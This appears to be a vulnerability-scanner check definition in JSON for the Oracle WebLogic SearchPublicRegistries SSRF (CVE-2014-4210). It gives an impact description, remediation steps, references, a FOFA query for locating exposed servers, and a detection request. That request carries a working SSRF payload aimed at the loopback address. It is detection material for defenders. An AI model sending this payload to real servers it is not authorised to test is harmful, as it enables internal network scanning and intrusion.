{
"Name": "WebLogic SearchPublicRegistries SSRF(CVE-2014-4210)",
"Description": "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.",
"Product": "WebLogic",
"Homepage": "http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html",
"DisclosureDate": "2013-12-01",
"Author": "Mrcat",
"FofaQuery": "app=\"BEA-WebLogic-Server\"",
"GobyQuery": "",
"Level": "2",
"Impact": "It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.\u003cbr/\u003eSSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).",
"Recommendation": "\u003cp style=\"text-align: start;\"\u003e1.如果业务不需要UDDI功能,就关闭这个功能。可以删除uddiexplorer文件夹,可在/weblogicPath/server/lib/uddiexplorer.war解压后,注释掉上面的jsp再打包。\u003c/p\u003e\u003cp style=\"text-align: start;\"\u003e2.安装oracle的更新包。\u003ca target=\"_blank\" href=\"http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\"\u003ehttp://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\u003c/a\u003e\u003c/p\u003e",
"References": [
"https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html",
"https://nvd.nist.gov/vuln/detail/CVE-2014-4210",
"https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf",
"http://seclists.org/fulldisclosure/2014/Dec/23",
"http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html",
"http://www.securityfocus.com/archive/1/534161/100/0/threaded",
"http://www.securityfocus.com/bid/68629",
"http://www.vmware.com/security/advisories/VMSA-2014-0012.html",
"https://exchange.xforce.ibmcloud.com/vulnerabilities/94554",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4210"
],
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "Tips",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"header": {},
"method": "GET",
"uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1\u0026rdoSearch=name\u0026txtSearchname=sdf\u0026txtSearchkey=\u0026txtSearchfor=\u0026selfor=Business+location\u0026btnSubmit=Search"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused",
"variable": "$body"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "Received a response from url",
"variable": "$body"
}
],
"operation": "OR",
"type": "group"
},
"SetVariable": []
}
],
"Tags": [
"ssrf"
],
"CVEIDs": [
"CVE-2014-4210"
],
"CVSSScore": "5.0"
}